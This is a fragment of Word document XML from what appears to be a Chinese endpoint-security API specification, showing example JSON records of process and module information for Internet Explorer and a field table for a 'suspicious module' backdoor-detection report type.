      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_base_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0x1150000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>load_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1527218501,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 819200,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_md5": "5f1b1148c830c0f149a476a58ce0d09d",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>load_reason</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_base</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 18153472,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "iexplore.exe"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>thread_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1962227952,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>create_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1527218503,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wait_reason</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 6,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mem_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "MEM_IMAGE",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "state": 5,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>thread_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1860,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mem_protect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "EXECUTE_READ"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>start_address_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0x74F538F0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_ctime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_mtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_atime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>black_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "Microsoft Corporation",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent_process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2168,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>create_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1527218501,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_wow64": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2736,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_64bit": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>image_file_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent_process_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_ctime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_mtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_atime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>black_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ret_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0x00000010"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433156D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="493" w:name="_Toc115166319"/>
      <w:bookmarkStart w:id="494" w:name="后门类型可疑模块"/>
      <w:bookmarkEnd w:id="486"/>
      <w:bookmarkEnd w:id="492"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>后门类型：可疑模块</w:t>
      </w:r>
      <w:bookmarkEnd w:id="493"/>
    </w:p>
    <w:p w14:paraId="56DD004B"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1793"/>
        <w:gridCol w:w="828"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3240"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="535DB26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761320E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66CA4A1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7989D3EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="379467C5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="66B11539" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C92F2D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ret_code</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C7AE385" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51772EBF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64492F86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>返回code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1ACCC588" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32881AFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>extend_ret_code</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A7FB88C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00D79088" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68D05153" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>返回扩展code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3587519C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CC2B252" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>process_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="143FCB4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E674F2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C550AAD" w14:textId="41B7911D" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程信息，</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "processinfo数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>process_info数据结构</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1930A0C3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2352A172" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>module_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="340848BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CDB4896" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="437C78BC" w14:textId="3A46DC87" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块信息，</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "moduleinfo数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>module_info数据结构</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="799411DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E0787" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ret_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0x00000100",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "C:\\Windows\\SysWOW64\\ieframe.dll",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_base_str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0x737D0000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>load_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1527218501,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 12840960,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>load_reason</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_base</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1937571840,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "ieframe.dll",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_md5"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_ctime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_mtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f_atime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"=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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>black_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "Microsoft Corporation",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent_process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2168,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>create_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1527218501,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_wow64": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>process_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2736,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_64bit": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>image_file_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parent_process_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
